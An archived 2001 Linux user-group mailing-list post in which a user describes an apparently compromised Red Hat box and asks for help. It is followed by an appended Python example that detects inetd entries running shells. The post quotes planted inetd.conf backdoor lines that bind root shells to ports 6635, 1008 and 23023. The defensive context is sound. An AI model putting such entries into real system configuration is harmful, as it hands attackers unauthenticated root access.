VanLUG Email Archive


VanLUG Mailing List

Derek Tam (dtam@langara.bc.ca)
Mon, 19 Mar 2001 09:53:49 -0800


Hi There,

I found that two files, 'inetd.conf' and 'services', have been
changed in /etc. The 'inetd.conf' became:

telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
6635 stream tcp nowait root /bin/sh sh -i
1008 stream tcp nowait root /bin/sh sh
deck stream tcp nowait root /bin/sh sh -i

and in the 'services' file, there is a line at the end of the file

deck 23023/tcp

I didn't change the 'inetd.conf' (just commented out some of the services from
the original file) and didn't add the 'deck' service to the 'services'
file. Also, I don't know what the above two lines (6635 and 1008) are
doing.

Can anyone tell me what 'deck', '6635' and '1008' are? Is that the hole on
my computer?

Thanks,

Derek

On 16 Mar 2001, at 10:38, Derek Tam wrote:

>Hi There,
>
>I have a RedHat Linux 6.0 (2.2.16-3) box at home, and I use 'IPCHAINS' to
>set up the firewall. Recently, I found that I can't use the 'ps -fe' command on
>my machine (not that it really doesn't work, but it only displays my shell
>process and the getty processes). But I can still use 'ps -aux'.
>
>Until yesterday, I found that I couldn't log on to my computer in text
>mode. I tried to log in using other users including root, and it just returned
>'incorrect login'. I rebooted the machine, but that still didn't help. When I
>switched to GUI mode, I could log in to my machine. I found that there were two
>more users in the passwd and shadow files. I deleted the two users (one
>is 'b' and the other one is 'bb') from these files and rebooted, but that still
>didn't help (I still couldn't log in in text mode). This morning, I tried
>to log in (in GUI mode), and it just gave me a 'blue' screen. I knew that I could
>log in, but couldn't start up enlightenment.
>
>Was my computer hacked? Can anybody help me to fix it? Once fixed, how can I
>protect my computer? I haven't installed ssh (sometimes I telnet from a
>remote site) on my machine; should I install it? Does RedHat have an ssh
>RPM?
>
>Many thanks,
>
>
>Derek
>
>

--
This message came to you via the Vancouver Linux Users Group mailing list.
For unsubscription instructions do not email the list, but rather send mail
to <vanlug-request@gweep.bc.ca>.
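
Added example, not part of the original message: a Python check that reads inetd.conf-format text, flags every active entry whose server program is a shell, and resolves named services to ports through services-format text. The sample input is constructed from the lines quoted in the message; the function names, the shell list and the `telnet 23/tcp` services line are assumptions made for the example.

```python
import os

# Assumed list of shell binaries worth flagging as an inetd server program.
SHELLS = {"sh", "bash", "ash", "dash", "csh", "tcsh", "ksh", "zsh"}

# Constructed sample input, built from the lines quoted in the message.
INETD_CONF = """\
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
6635 stream tcp nowait root /bin/sh sh -i
1008 stream tcp nowait root /bin/sh sh
deck stream tcp nowait root /bin/sh sh -i
"""
SERVICES = """\
telnet 23/tcp
deck 23023/tcp
"""

def parse_services(text):
    """Map (name, proto) -> port from services-format text, aliases included."""
    ports = {}
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2 and "/" in fields[1]:
            port, proto = fields[1].split("/", 1)
            if port.isdigit():
                for name in [fields[0]] + fields[2:]:
                    ports[(name, proto)] = int(port)
    return ports

def find_shell_listeners(inetd_text, services_text):
    """Return (port, user, command) for each active entry that runs a shell."""
    ports = parse_services(services_text)
    hits = []
    for line in inetd_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) < 6:
            continue  # blank, commented out, or malformed line
        service, _sock, proto, _wait, user, program = fields[:6]
        if os.path.basename(program) not in SHELLS:
            continue
        # inetd accepts either a port number or a name looked up in services.
        port = int(service) if service.isdigit() else ports.get((service, proto))
        hits.append((port, user, " ".join(fields[5:])))
    return hits

if __name__ == "__main__":
    for port, user, cmd in find_shell_listeners(INETD_CONF, SERVICES):
        print(f"port {port}/tcp: inetd runs {cmd!r} as {user}")
```

A port of `None` in the result means the service name has no matching entry in the services text supplied.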



This archive was generated by hypermail 2.0b3 on Tue 03 Jul 2001 - 19:14:50